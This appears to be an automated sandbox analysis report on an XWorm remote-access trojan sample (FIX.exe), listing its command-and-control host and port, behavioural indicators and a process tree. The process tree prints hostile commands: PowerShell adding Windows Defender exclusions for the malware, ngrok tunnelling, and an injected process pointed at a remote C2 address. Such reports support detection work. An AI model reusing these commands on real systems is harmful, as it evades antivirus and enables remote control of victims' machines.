Analysis
-
max time kernel
1787s -
max time network
1799s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
19-01-2025 03:39
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
xworm
accommodation-hydrogen.gl.at.ply.gg:64129
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0028000000046288-200.dat family_xworm behavioral1/memory/2200-250-0x0000000000CE0000-0x0000000000CF8000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2412 powershell.exe 3912 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation FIX.exe -
Executes dropped EXE 5 IoCs
pid Process 2200 FIX.exe 476 ngrok.exe 5000 FIX.exe 5204 FIX.exe 3932 FIX.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2200 set thread context of 5440 2200 FIX.exe 133 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\82ac5f61-3416-4929-b78e-cbcbdb70214f.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250119033959.pma setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ngrok.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 5264 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class 17 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Documents" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1\NodeSlot = "4" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 0100000000000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\1 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 128520.crdownload:SmartScreen msedge.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2200 FIX.exe 4560 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2552 msedge.exe 2552 msedge.exe 2844 msedge.exe 2844 msedge.exe 4712 identity_helper.exe 4712 identity_helper.exe 2128 msedge.exe 2128 msedge.exe 2412 powershell.exe 2412 powershell.exe 2412 powershell.exe 3912 powershell.exe 3912 powershell.exe 3912 powershell.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe 2200 FIX.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2200 FIX.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 2200 FIX.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeIncreaseQuotaPrivilege 2412 powershell.exe Token: SeSecurityPrivilege 2412 powershell.exe Token: SeTakeOwnershipPrivilege 2412 powershell.exe Token: SeLoadDriverPrivilege 2412 powershell.exe Token: SeSystemProfilePrivilege 2412 powershell.exe Token: SeSystemtimePrivilege 2412 powershell.exe Token: SeProfSingleProcessPrivilege 2412 powershell.exe Token: SeIncBasePriorityPrivilege 2412 powershell.exe Token: SeCreatePagefilePrivilege 2412 powershell.exe Token: SeBackupPrivilege 2412 powershell.exe Token: SeRestorePrivilege 2412 powershell.exe Token: SeShutdownPrivilege 2412 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: SeSystemEnvironmentPrivilege 2412 powershell.exe Token: SeRemoteShutdownPrivilege 2412 powershell.exe Token: SeUndockPrivilege 2412 powershell.exe Token: SeManageVolumePrivilege 2412 powershell.exe Token: 33 2412 powershell.exe Token: 34 2412 powershell.exe Token: 35 2412 powershell.exe Token: 36 2412 powershell.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeIncreaseQuotaPrivilege 3912 powershell.exe Token: SeSecurityPrivilege 3912 powershell.exe Token: SeTakeOwnershipPrivilege 3912 powershell.exe Token: SeLoadDriverPrivilege 3912 powershell.exe Token: SeSystemProfilePrivilege 3912 powershell.exe Token: SeSystemtimePrivilege 3912 powershell.exe Token: SeProfSingleProcessPrivilege 3912 powershell.exe Token: SeIncBasePriorityPrivilege 3912 powershell.exe Token: SeCreatePagefilePrivilege 3912 powershell.exe Token: SeBackupPrivilege 3912 powershell.exe Token: SeRestorePrivilege 3912 powershell.exe Token: SeShutdownPrivilege 3912 powershell.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeSystemEnvironmentPrivilege 3912 powershell.exe Token: SeRemoteShutdownPrivilege 3912 powershell.exe Token: SeUndockPrivilege 3912 powershell.exe Token: SeManageVolumePrivilege 3912 powershell.exe Token: 33 3912 powershell.exe Token: 34 3912 powershell.exe Token: 35 3912 powershell.exe Token: 36 3912 powershell.exe Token: SeDebugPrivilege 2200 FIX.exe Token: SeDebugPrivilege 5264 taskkill.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 5000 FIX.exe Token: SeDebugPrivilege 5204 FIX.exe Token: SeDebugPrivilege 3932 FIX.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe 2844 msedge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2200 FIX.exe 2200 FIX.exe 4560 explorer.exe 4560 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2844 wrote to memory of 3572 2844 msedge.exe 83 PID 2844 wrote to memory of 3572 2844 msedge.exe 83 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 4888 2844 msedge.exe 84 PID 2844 wrote to memory of 2552 2844 msedge.exe 85 PID 2844 wrote to memory of 2552 2844 msedge.exe 85 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 PID 2844 wrote to memory of 2984 2844 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/VW0uCo1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0xdc,0x130,0x7ffe53b446f8,0x7ffe53b44708,0x7ffe53b447182⤵PID:3572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:4888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:82⤵PID:2984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:5896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:12⤵PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:12⤵PID:3604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:82⤵PID:544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:4460 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6f2055460,0x7ff6f2055470,0x7ff6f20554803⤵PID:2216
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5740 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:12⤵PID:5924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:12⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:12⤵PID:4380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:3804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:12⤵PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6060 /prefetch:82⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:12⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6720 /prefetch:82⤵PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,2912279265024079728,13303378651841405644,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6396 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2128
-
-
C:\Users\Admin\Downloads\FIX.exe"C:\Users\Admin\Downloads\FIX.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\FIX.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FIX.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /im ngrok.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\ngrok.exeC:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken Your_Authtoken3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:476
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.21 64129 <123456789> B9EDCE3B38CCFC5FBDB23⤵
- System Location Discovery: System Language Discovery
PID:5440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text5⤵
- System Location Discovery: System Language Discovery
PID:3340
-
-
-
-
-
